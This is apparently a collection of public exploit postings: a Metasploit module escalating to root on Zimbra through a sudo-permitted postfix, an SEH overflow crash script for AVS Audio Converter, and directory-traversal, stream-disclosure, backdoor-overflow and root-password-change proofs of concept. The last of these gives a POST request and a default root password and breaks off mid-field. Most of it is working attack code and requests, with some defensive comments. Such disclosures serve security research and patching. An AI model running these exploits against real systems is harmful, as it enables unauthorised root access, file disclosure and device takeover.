##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Local privilege escalation for Zimbra hosts whose sudoers configuration lets the
# zimbra user run postfix as root without a password (CVE-2022-3569, see References).
# Everything the module does on the host is observable: `sudo -n -l` and the
# `sudo ... postfix` invocation go through sudo (hence IOC_IN_LOGS in Notes), and a
# payload executable is written to WritableDir. Removing or restricting the
# NOPASSWD postfix entry in sudoers removes the condition #check looks for.
class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  # AutoCheck runs #check ahead of #exploit, so nothing is dropped on a host
  # where the sudoers line was not observed.
  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Post::Linux::Priv
  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  # Module metadata and options.
  #
  # @param info [Hash] metadata merged by the framework via update_info.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Zimbra sudo + postfix privilege escalation',
        'Description' => %q{
          This module exploits a vulnerable sudo configuration that permits the
          zimbra user to execute postfix as root. In turn, postfix can execute
          arbitrary shellscripts, which means it can execute a root shell.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'EvergreenCartoons', # discovery and poc
          'Ron Bowes', # Module
        ],
        'DisclosureDate' => '2022-10-13',
        'Platform' => [ 'linux' ],
        'Arch' => [ ARCH_X86, ARCH_X64 ],
        'SessionTypes' => [ 'shell', 'meterpreter' ],
        'Privileged' => true,
        'References' => [
          [ 'CVE', '2022-3569' ],
          [ 'URL', 'https://twitter.com/ldsopreload/status/1580539318879547392' ],
        ],
        'Targets' => [
          [ 'Auto', {} ],
        ],
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => [ REPEATABLE_SESSION ],
          'Stability' => [ CRASH_SAFE ],
          'SideEffects' => [ IOC_IN_LOGS ]
        }
      )
    )
    # SUDO_PATH is the binary #check invokes for `sudo -n -l`; ZIMBRA_BASE is
    # prefixed to common/sbin/postfix both for the file test and the sudoers match.
    register_options [
      OptString.new('SUDO_PATH', [ true, 'Path to sudo executable', 'sudo' ]),
      OptString.new('ZIMBRA_BASE', [ true, "Zimbra's installation directory", '/opt/zimbra' ]),
    ]
    # WritableDir receives the payload executable; PayloadFilename, when unset,
    # is replaced by a random dot-prefixed name in #exploit.
    register_advanced_options [
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
      OptString.new('PayloadFilename', [ false, 'The name to use for the executable (default: ".<random>"' ])
    ]
  end

  # Because this isn't patched, I can't say with 100% certainty that this will
  # detect a future patch (it depends on how they patch it)
  #
  # Decides whether the session looks vulnerable without modifying the host: it
  # only tests for the postfix binary, for sudo, and for a
  # "(root) NOPASSWD: <ZIMBRA_BASE>/common/sbin/postfix" line in `sudo -n -l` output.
  #
  # @return [Msf::Exploit::CheckCode] Appears when the sudoers line is present,
  #   Safe otherwise. fail_with aborts the run if the session is already root.
  def check
    # Sanity check
    if is_root?
      fail_with(Failure::None, 'Session already has root privileges')
    end

    unless file_exist?("#{datastore['ZIMBRA_BASE']}/common/sbin/postfix")
      print_error("postfix executable not detected: #{datastore['ZIMBRA_BASE']}/common/sbin/postfix (set ZIMBRA_BASE if Zimbra is installed in an unusual location)")
      return CheckCode::Safe
    end

    unless command_exists?(datastore['SUDO_PATH'])
      # NOTE(review): the message interpolates datastore['SUDOPATH'] (no underscore),
      # which is not a registered option and so renders as an empty string; the
      # option actually consulted is SUDO_PATH.
      print_error("Could not find sudo: #{datastore['SUDOPATH']} (set SUDO_PATH if sudo isn't in $PATH)")
      return CheckCode::Safe
    end

    # Run `sudo -n -l` to make sure we have access to the target command
    # -n makes sudo non-interactive, so a password requirement shows up as text
    # in the output (matched below) instead of a prompt.
    cmd = "#{datastore['SUDO_PATH']} -n -l"
    print_status "Executing: #{cmd}"
    output = cmd_exec(cmd).to_s

    # `!output` cannot be true after .to_s; the string tests cover the usage
    # banner, an unsupported flag, and the password-required message.
    if !output || output.start_with?('usage:') || output.include?('illegal option') || output.include?('a password is required')
      print_error('Current user could not execute sudo -l')
      return CheckCode::Safe
    end

    # The match is on the exact sudoers rendering; a rule written differently
    # (other path spelling, password required) is reported as Safe.
    if !output.include?("(root) NOPASSWD: #{datastore['ZIMBRA_BASE']}/common/sbin/postfix")
      print_error('Current user does not have access to run postfix')
      return CheckCode::Safe
    end

    CheckCode::Appears
  end

  # Writes the payload executable into WritableDir and runs it through the
  # sudo-permitted postfix binary. The dropped file is registered with
  # FileDropper, which removes it during module cleanup; the sudo invocation
  # itself is recorded by sudo's own logging.
  #
  # Aborts via fail_with(Failure::BadConfig) when WritableDir is not writable.
  def exploit
    base_dir = datastore['WritableDir'].to_s
    unless writable?(base_dir)
      fail_with(Failure::BadConfig, "#{base_dir} is not writable")
    end

    # Generate some filenames
    # With PayloadFilename unset the name is ".<5-10 random alphanumerics>";
    # the leading dot keeps it out of a plain directory listing, which is worth
    # remembering when hunting for the artifact.
    payload_path = File.join(base_dir, datastore['PayloadFilename'] || ".#{rand_text_alphanumeric(5..10)}")
    upload_and_chmodx(payload_path, generate_payload_exe)
    register_file_for_cleanup(payload_path)

    # postfix receives the payload path as its final argument; the Description
    # above is the basis for expecting it to be executed.
    cmd = "sudo #{datastore['ZIMBRA_BASE']}/common/sbin/postfix -D -v #{payload_path}"
    print_status "Attempting to trigger payload: #{cmd}"
    out = cmd_exec(cmd)

    # Command output is only surfaced when no session came back, to aid triage.
    unless session_created?
      print_error("Failed to create session! Cmd output = #{out}")
    end
  end
end
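# Exploit Title: AVS Audio Converter 10.3 - Stack Overflow (SEH)
# Discovered by: Yehia Elghaly - Mrvar0x
# Discovered Date: 2022-10-16
# Tested Version: 10.3.1.633
# Tested on OS: Windows 7 Professional x86

#pop+ret Address=005154E6
#Message= 0x005154e6 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [AVSAudioConverter.exe]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v10.3.1.633 (C:\Program Files\AVS4YOU\AVSAudioConverter\AVSAudioConverter.exe)

# The only module that has SafeSEH disabled.
# Base | Top | Rebase | SafeSEH | ASLR | NXCompat | OS Dll |
# 0x00400000 | 0x01003000 | False | False | False | False | False |

#Allocating 4-bytes for nSEH which should be placed directly before SEH which also takes up 4-bytes.

#Buffer = '\x41'* 260
#nSEH = '\x42'*4
#SEH = '\x43'*4
#ESI = 'D*44' # ESI Overwrite

#buffer = "A"*260 + [nSEH] + [SEH] + "D"*44
#buffer = "A"*260 + "B"*4 + "\xE6\x54\x51\x05" + "D"*44


# Rexploit:
# Generate the 'evil.txt' payload using python 2.7.x on Linux.
# Open the file 'evil.txt' Copy.
# Paste at'Output Folder and click 'Browse'.

#!/usr/bin/python -w

# Writes a fixed 312-byte marker pattern to evil.txt: 260 'A', then 4 'B'
# (nSEH slot), 4 'C' (SEH slot) and 44 'D'. The file holds only these letters
# and no executable code; it is a crash-reproduction input for the steps above.
filename = "evil.txt"

buffer = "A"*260 + "B"*4 + "C"*4 + "D"*44

# Context manager closes the handle even if write() raises; the original
# open()/close() pair left it open on error.
with open(filename, 'w') as textfile:
    textfile.write(buffer)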
<pre><code>Document Title:<br />===============<br />Webile v1.0.1 - Directory Traversal Web Vulnerability<br /><br /><br />References (Source):<br />====================<br />https://www.vulnerability-lab.com/get_content.php?id=2320<br /><br /><br />Release Date:<br />=============<br />2022-10-10<br /><br /><br />Vulnerability Laboratory ID (VL-ID):<br />====================================<br />2320<br /><br /><br />Common Vulnerability Scoring System:<br />====================================<br />7.3<br /><br /><br />Vulnerability Class:<br />====================<br />Directory- or Path-Traversal<br /><br /><br />Current Estimated Price:<br />========================<br />1.000€ - 2.000€<br /><br /><br />Product & Service Introduction:<br />===============================<br />Webile, is a local area network cross-platform file management tool based on http protocol. Using the personal mobile phone as a server in<br />the local area network, browsing mobile phone files, uploading files, downloading files, playing videos, browsing pictures, transmitting data,<br />statistics files, displaying performance, etc. No need to connect to the Internet, you can browse files, send data, play videos and other<br />functions through WiFi LAN or mobile phone hotspot, and no additional data traffic will be generated during data transmission. 
Support Mac,<br />Windows, Linux, iOS, Android and other multi-platform operating systems.<br /><br />(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.wifile.webile&hl=en&gl=US )<br /><br /><br />Abstract Advisory Information:<br />==============================<br />The vulnerability laboratory core research team discovered a directory traversal web vulnerability in the Webile v1.0.1 Wifi mobile web application.<br /><br />Affected Product(s):<br />====================<br />Product Owner: Webile<br />Product: Webile v1.0.1 - (Framework) (Mobile Web-Application)<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2022-02-06: Researcher Notification & Coordination (Security Researcher)<br />2022-02-07: Vendor Notification (Security Department)<br />2022-**-**: Vendor Response/Feedback (Security Department)<br />2022-**-**: Vendor Fix/Patch (Service Developer Team)<br />2022-**-**: Security Acknowledgements (Security Department)<br />2022-10-10: Public Disclosure (Vulnerability Laboratory)<br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Exploitation Technique:<br />=======================<br />Remote<br /><br /><br />Severity Level:<br />===============<br />High<br /><br /><br />Authentication Type:<br />====================<br />Open Authentication (Anonymous Privileges)<br /><br /><br />User Interaction:<br />=================<br />No User Interaction<br /><br /><br />Disclosure Type:<br />================<br />Independent Security Research<br /><br /><br />Technical Details & Description:<br />================================<br />A directory traversal web vulnerability has been discovered in the Webile v1.0.1 wifi mobile web application.<br />The vulnerability allows remote attackers to change the application path in performed requests to compromise the<br />local application or file-system of a mobile device. 
Attackers are for example able to request environment<br />variables or a sensitive system path.<br /><br />The directory-traversal web vulnerability is located in the insecure web-server configuration. The path of the local user is not<br />secure restricted and validated. Thus allows an unauthenticated user with wifi access to request local web-server files without<br />secure permission. The bug itself is located in the filepath parameter of the change_upload_dir function.<br /><br />Exploitation of the directory traversal web vulnerability requires no privileged web-application user account or user interaction.<br />Successful exploitation of the vulnerability results in information leaking by unauthorized file access and mobile application compromise.<br /><br /><br />Proof of Concept (PoC):<br />=======================<br />The directory traversal web vulnerability can be exploited by remote attackers without user account or user interaction.<br />For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue.<br /><br /><br />PoC: Exploitation<br />http://localhost:8080/webile_select_dir?t=change_upload_dir&filepath=../../../../../../../../../../../../etc/<br /><br /><br />--- PoC Session Logs ---<br />http://localhost:8080/webile_select_dir?t=change_upload_dir&filepath=../../../../../../../../../../../../etc/<br />Host: localhost:8080<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: de,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Connection: keep-alive<br />Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6<br />Upgrade-Insecure-Requests: 1<br />-<br />GET: HTTP/1.1 200 OK<br />Content-Type: text/html; charset=UTF-8<br />Connection: keep-alive<br />Content-Encoding: gzip<br />Transfer-Encoding: 
chunked<br /><br /><br />--- FS Session Logs ---<br />Output:<br />File name <br />bluetooth<br />bpf<br />carrier<br />compatconfig<br />init<br />permissions<br />ppp<br />seccomp_policy<br />security<br />selinux<br />sensors<br />sysconfig<br />textclassifier<br />theme<br />vintf<br />epdg<br />ipm<br /><br /><br />Security Risk:<br />==============<br />The security risk of the directory traversal web vulnerability in the mobile web application is estimated as high.<br /><br /><br />Credits & Authors:<br />==================<br />Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab<br /><br /><br />Disclaimer & Information:<br />=========================<br />The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,<br />either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab<br />or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits<br />or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do<br />not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.<br />We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.<br /><br />Domains: https://www.vulnerability-lab.com ; https://www.vuln-lab.com ;https://www.vulnerability-db.com<br /><br />Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.<br />Permission to electronically redistribute this alert in its unmodified form is granted. 
All other rights, including the use of other<br />media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other<br />information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list, modify, use or<br />edit our material, contact (admin@ or research@) to ask for permission.<br /><br /> Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™<br /><br /><br /><br />-- <br />VULNERABILITY LABORATORY (VULNERABILITY LAB)<br />RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE<br /><br /></code></pre>
<pre><code><br />MiniDVBLinux 5.4 Unauthenticated Stream Disclosure Vulnerability<br /><br /><br />Vendor: MiniDVBLinux<br />Product web page: https://www.minidvblinux.de<br />Affected version: <=5.4<br /><br />Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple<br />way to convert a standard PC into a Multi Media Centre based on the<br />Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this<br />Linux based Digital Video Recorder: Watch TV, Timer controlled<br />recordings, Time Shift, DVD and MP3 Replay, Setup and configuration<br />via browser, and a lot more. MLD strives to be as small as possible,<br />modular, simple. It supports numerous hardware platforms, like classic<br />desktops in 32/64bit and also various low power ARM systems.<br /><br />Desc: The application suffers from an unauthenticated live stream<br />disclosure when /tpl/tv_action.sh is called and generates a snapshot<br />in /var/www/images/tv.jpg through the Simple VDR Protocol (SVDRP).<br /><br />--------------------------------------------------------------------<br />/var/www/tpl/tv_action.sh:<br />--------------------------<br />01: #!/bin/sh<br />02:<br />03: header<br />04:<br />05: quality=60<br />06: svdrpsend.sh "GRAB /tmp/tv.jpg $quality $(echo "$query" | sed "s/width=\(.*\)&height=\(.*\)/\1 \2/g")"<br />07: mv -f /tmp/tv.jpg /var/www/images 2>/dev/null<br />--------------------------------------------------------------------<br /><br />Tested on: MiniDVBLinux 5.4<br /> BusyBox v1.25.1<br /> Architecture: armhf, armhf-rpi2<br /> GNU/Linux 4.19.127.203 (armv7l)<br /> VideoDiskRecorder 2.4.6<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5716<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5716.php<br /><br /><br />24.09.2022<br /><br />--<br /><br /><br />1. 
Generate screengrab:<br /> - Request: curl http://ip:8008/tpl/tv_action.sh -H "Accept: */*"<br /> - Response: <br />220 mld SVDRP VideoDiskRecorder 2.4.6; Mon Sep 12 00:44:10 2022; UTF-8<br />250 Grabbed image /tmp/tv.jpg 60<br />221 mld closing connection<br /><br />2. View screengrab:<br /> - Request: curl http://ip:8008/images/tv.jpg<br /><br />3. Or use a browser:<br /> - http://ip:8008/home?site=remotecontrol<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/1164ef21ef2af97e0339359c0dce5e7d.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.DarkSky.23<br />Vulnerability: Remote Stack Buffer Overflow (SEH)<br />Description: The malware listens on TCP port 5418. Third-party adversaries who can reach the server can send a specially crafted payload triggering a stack buffer overflow overwriting EDX register and Structured Exception Handler (SEH). In order to see the typical exploit pattern of "\x41" "AAAA" we need to actually send "\x50" as there is an loop that performs an XOR converting our payload. Therefore, if we send "AAAAAAAA" we will get "PPPPPPPP", the malware performs the XOR with the value of 11.<br />Family: DarkSky<br />Type: PE32<br />MD5: 1164ef21ef2af97e0339359c0dce5e7d<br />Vuln ID: MVID-2022-0648<br />Dropped files: SysArchive.exe, KNREL32.exe, notepade.exe<br />ASLR: False<br />DEP: False<br />CFG: False<br />Safe SEH: False<br />Disclosure: 10/15/2022<br /><br />Example:<br /><br />0040134A | 80 34 31 11 | xor byte ptr ds:[ecx+esi],11 | ;XOR converting the payload happens here.<br />0040134E | 41 | inc ecx |<br />0040134F | 3B C8 | cmp ecx,eax |<br />00401351 | 7C F7 | jl sysarchive.40134A |<br />00401353 | 5E | pop esi |<br />00401354 | C3 | ret |<br /><br /><br />Python test...<br /><br />>>> 0x41 ^ 0x11<br />80<br />>>> hex(80)<br />'0x50'<br />>>> chr(0x50)<br />'P'<br /><br />GET /AAAAA will then become all "P" ...<br /><br />0019D24C 56 54 45 31 3E 50 50 50 50 50 41 41 41 41 41 41 VTE1>PPPPPAAAAAA <br />0019D25C 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA <br />0019D26C 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA <br />0019D27C 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA <br />0019D28C 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA <br /><br 
/>So to get our \x41 pattern we need to supply \x50, the malware will XOR it with 0x11 giving us \x41.<br /><br />>>> 0x50 ^ 0x11<br />65<br />>>> hex(65)<br />'0x41'<br />>>> chr(65)<br />'A'<br /><br />EAX : 7EFEFEFE<br />EBX : 02902A58<br />ECX : 0019F4B0<br />EDX : 41414141<br />EBP : 0019D230<br />ESP : 0019D214<br />ESI : 0019D777<br />EDI : 0019FF81<br />EIP : 7451561B msvcrt.7451561B<br /><br /><br />Finally we see our desired exploit payload converted from \x50 'P' to \x41 or "A" <br /><br />0019D240 08 DF 8E 02 08 DF 8E 02 01 00 00 00 56 54 45 31 .ß...ß......VTE1 <br />0019D250 3E 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 >AAAAAAAAAAAAAAA <br />0019D260 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA <br />0019D270 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA <br />0019D280 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 50 AAAAAAAAAAAAAAAP <br />0019D290 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 PPPPPPPPPPPPPPPP <br />0019D2A0 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 PPPPPPPPPPPPPPPP<br /><br /><br />Memory Dump:<br />(2798.242c): Stack buffer overflow - code c0000409 (first/second chance not available)<br />eax=00000000 ebx=00000000 ecx=0019f52c edx=41414141 esi=00000000 edi=00000002<br />eip=7770ed3c esp=0019cb60 ebp=0019cba0 iopl=0 nv up ei pl nz ac pe nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216<br />ntdll!ZwWaitForMultipleObjects+0xc:<br />7770ed3c c21400 ret 14h<br /><br />0:000> .ecxr<br />eax=7efefefe ebx=02552c88 ecx=0019f52c edx=41414141 esi=0019d777 edi=0019fffd<br />eip=74515619 esp=0019d214 ebp=0019d230 iopl=0 nv up ei pl zr na pe nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246<br />msvcrt!strcat+0x89:<br />74515619 8917 mov dword ptr [edi],edx ds:002b:0019fffd=41000000<br />*** WARNING: Unable to verify checksum for SysArchive.exe<br />*** ERROR: Module load completed but symbols could not be loaded for SysArchive.exe<br /><br />0:000> !analyze 
-v<br />*******************************************************************************<br />* *<br />* Exception Analysis *<br />* *<br />*******************************************************************************<br /><br />Failed calling InternetOpenUrl, GLE=12029<br /><br />FAULTING_IP: <br />msvcrt!strcat+89<br />74515619 8917 mov dword ptr [edi],edx<br /><br />EXCEPTION_RECORD: 0019cd64 -- (.exr 0x19cd64)<br />ExceptionAddress: 74515619 (msvcrt!strcat+0x00000089)<br /> ExceptionCode: c0000005 (Access violation)<br /> ExceptionFlags: 00000008<br />NumberParameters: 2<br /> Parameter[0]: 00000001<br /> Parameter[1]: 001a0000<br />Attempt to write to address 001a0000<br /><br />PROCESS_NAME: SysArchive.exe<br /><br />ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.<br /><br />EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. 
This overrun could potentially allow a malicious user to gain control of this application.<br /><br />EXCEPTION_PARAMETER1: 00000015<br /><br />MOD_LIST: <ANALYSIS/><br /><br />NTGLOBALFLAG: 70<br /><br />APPLICATION_VERIFIER_FLAGS: 0<br /><br />CHKIMG_EXTENSION: !chkimg -lo 50 -d !msvcrt<br /> 74515590 - msvcrt!strcat<br /> [ 8b:cc ]<br /> 74515617 - msvcrt!strcat+87 (+0x87)<br /> [ eb:cc ]<br />2 errors : !msvcrt (74515590-74515617)<br /><br />CONTEXT: 0019cdb4 -- (.cxr 0x19cdb4)<br />eax=7efefefe ebx=02552c88 ecx=0019f52c edx=41414141 esi=0019d777 edi=0019fffd<br />eip=74515619 esp=0019d214 ebp=0019d230 iopl=0 nv up ei pl zr na pe nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246<br />msvcrt!strcat+0x89:<br />74515619 8917 mov dword ptr [edi],edx ds:002b:0019fffd=41000000<br />Resetting default scope<br /><br />WRITE_ADDRESS: 001a0000 <br /><br />FOLLOWUP_IP: <br />msvcrt!strcat+89<br />74515619 8917 mov dword ptr [edi],edx<br /><br />FAULTING_THREAD: 0000242c<br /><br />BUGCHECK_STR: APPLICATION_FAULT_MEMORY_CORRUPTION_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_LARGE_EXPLOITABLE_FILL_PATTERN_41414141<br /><br />PRIMARY_PROBLEM_CLASS: MEMORY_CORRUPTION_LARGE_EXPLOITABLE_FILL_PATTERN_41414141<br /><br />DEFAULT_BUCKET_ID: MEMORY_CORRUPTION_LARGE_EXPLOITABLE_FILL_PATTERN_41414141<br /><br />LAST_CONTROL_TRANSFER: from 00404ed7 to 74515619<br /><br />STACK_TEXT: <br />0019d214 00404ed7 0019e24c 0019d777 0019d238 msvcrt!strcat+0x89<br />WARNING: Stack unwind information not available. 
Following frames may be wrong.<br />0019d230 00402394 00004128 0019e24c 04ed39f8 SysArchive+0x4ed7<br />0019f9e8 41414141 41414141 41414141 41414141 SysArchive+0x2394<br />0019f9ec 41414141 41414141 41414141 41414141 0x41414141<br />0019f9f0 41414141 41414141 41414141 41414141 0x41414141<br />0019f9f4 41414141 41414141 41414141 41414141 0x41414141<br />0019f9f8 41414141 41414141 41414141 41414141 0x41414141<br />0019f9fc 41414141 41414141 41414141 41414141 0x41414141<br />0019fa00 41414141 41414141 41414141 41414141 0x41414141<br />0019fa04 41414141 41414141 41414141 41414141 0x41414141<br />0019fa08 41414141 41414141 41414141 41414141 0x41414141<br />0019fa0c 41414141 41414141 41414141 41414141 0x41414141<br />0019fa10 41414141 41414141 41414141 41414141 0x41414141<br />0019fa14 41414141 41414141 41414141 41414141 0x41414141<br />0019fa18 41414141 41414141 41414141 41414141 0x41414141<br />0019fa1c 41414141 41414141 41414141 41414141 0x41414141<br />0019fa20 41414141 41414141 41414141 41414141 0x41414141<br />0019fa24 41414141 41414141 41414141 41414141 0x41414141<br />0019fa28 41414141 41414141 41414141 41414141 0x41414141<br />0019fa2c 41414141 41414141 41414141 41414141 0x41414141<br />0019fa30 41414141 41414141 41414141 41414141 0x41414141<br />...<br /><br />SYMBOL_NAME: memory_corruption!msvcrt<br /><br />FOLLOWUP_NAME: MachineOwner<br /><br />MODULE_NAME: memory_corruption<br /><br />IMAGE_NAME: memory_corruption<br /><br />DEBUG_FLR_IMAGE_TIMESTAMP: 0<br /><br />STACK_COMMAND: dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; .cxr 0x19cdb4 ; kb<br /><br />FAILURE_BUCKET_ID: MEMORY_CORRUPTION_LARGE_EXPLOITABLE_FILL_PATTERN_41414141_c0000409_memory_corruption!msvcrt<br /><br />BUCKET_ID: APPLICATION_FAULT_MEMORY_CORRUPTION_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_LARGE_EXPLOITABLE_FILL_PATTERN_41414141_MISSING_GSFRAME_memory_corruption!msvcrt<br /><br />0:000> !exchain<br />0019cc18: ntdll!_except_handler4+0 (77716a50)<br /> CRT scope 0, 
func: ntdll!RtlReportExceptionHelper+251 (777557ad)<br />0019f9dc: 41414141<br />Invalid exception stack at 41414141<br /><br /><br />Exploit/PoC:<br />from socket import *<br /><br />MALWARE_HOST="x.x.x.x"<br />PORT=5418<br /><br />def doit():<br /> s=socket(AF_INET, SOCK_STREAM)<br /> s.connect((MALWARE_HOST, PORT))<br /><br /> JUNK="GET /"+"\x50"*1300+"HTTP/1.1\r\nHost:29"+"\x50"*10000<br /> PAYLOAD=JUNK+"\r\n\r\n"<br /><br /> s.send(PAYLOAD)<br /> s.close()<br /> print("Backdoor DarkSky.23 Exploit By malvuln")<br /><br />if __name__=="__main__":<br /> doit()<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code><br />MiniDVBLinux 5.4 Change Root Password PoC<br /><br /><br />Vendor: MiniDVBLinux<br />Product web page: https://www.minidvblinux.de<br />Affected version: <=5.4<br /><br />Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple<br />way to convert a standard PC into a Multi Media Centre based on the<br />Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this<br />Linux based Digital Video Recorder: Watch TV, Timer controlled<br />recordings, Time Shift, DVD and MP3 Replay, Setup and configuration<br />via browser, and a lot more. MLD strives to be as small as possible,<br />modular, simple. It supports numerous hardware platforms, like classic<br />desktops in 32/64bit and also various low power ARM systems.<br /><br />Desc: The application allows a remote attacker to change the root<br />password of the system without authentication (disabled by default)<br />and verification of previously assigned credential. Command execution<br />also possible using several POST parameters.<br /><br />Tested on: MiniDVBLinux 5.4<br /> BusyBox v1.25.1<br /> Architecture: armhf, armhf-rpi2<br /> GNU/Linux 4.19.127.203 (armv7l)<br /> VideoDiskRecorder 2.4.6<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5715<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5715.php<br /><br /><br />24.09.2022<br /><br />--<br /><br /><br />Default root password: mld500<br /><br />Change system password:<br />-----------------------<br /><br />POST /?site=setup&section=System HTTP/1.1<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6<br />Cache-Control: max-age=0<br />Connection: keep-alive<br />Content-Length: 778<br />Content-Type: 
application/x-www-form-urlencoded<br />Cookie: fadein=true; sessid=fb9b4f16b50c4d3016ef434c760799fc; PHPSESSID=jbqjvk5omsb6pbpas78ll57qnpmvb4st7fk3r7slq80ecrdsubebn31tptjhvfba<br />Host: ip:8008<br />Origin: http://ip:8008<br />Referer: http://ip:8008/?site=setup&section=System<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36<br />sec-gpc: 1<br /><br />APT_UPGRADE_CHECK=1&APT_SYSTEM_ID=1&APT_PACKAGE_CLASS_command=%2Fetc%2Fsetup%2Fapt.sh+setclass&APT_PACKAGE_CLASS=stable&SYSTEM_NAME=MiniDVBLinux&SYSTEM_VERSION_command=%2Fetc%2Fsetup%2Fbase.sh+setversion&SYSTEM_VERSION=5.4&SYSTEM_PASSWORD_command=%2Fetc%2Fsetup%2Fbase.sh+setpassword&SYSTEM_PASSWORD=r00t&BUSYBOX_ACPI_command=%2Fetc%2Fsetup%2Fbusybox.sh+setAcpi&BUSYBOX_NTPD_command=%2Fetc%2Fsetup%2Fbusybox.sh+setNtpd&BUSYBOX_NTPD=1&LOG_LEVEL=1&SYSLOG_SIZE_command=%2Fetc%2Fsetup%2Finit.sh+setsyslog&SYSLOG_SIZE=&LANG_command=%2Fetc%2Fsetup%2Flocales.sh+setlang&LANG=en_GB.UTF-8&TIMEZONE_command=%2Fetc%2Fsetup%2Flocales.sh+settimezone&TIMEZONE=Europe%2FKumanovo&KEYMAP_command=%2Fetc%2Fsetup%2Flocales.sh+setkeymap&KEYMAP=de-latin1&action=save&params=&changed=SYSTEM_PASSWORD+<br /><br /><br />Pretty post data:<br /><br />APT_UPGRADE_CHECK: 1<br />APT_SYSTEM_ID: 1<br />APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass<br />APT_PACKAGE_CLASS: stable<br />SYSTEM_NAME: MiniDVBLinux<br />SYSTEM_VERSION_command: 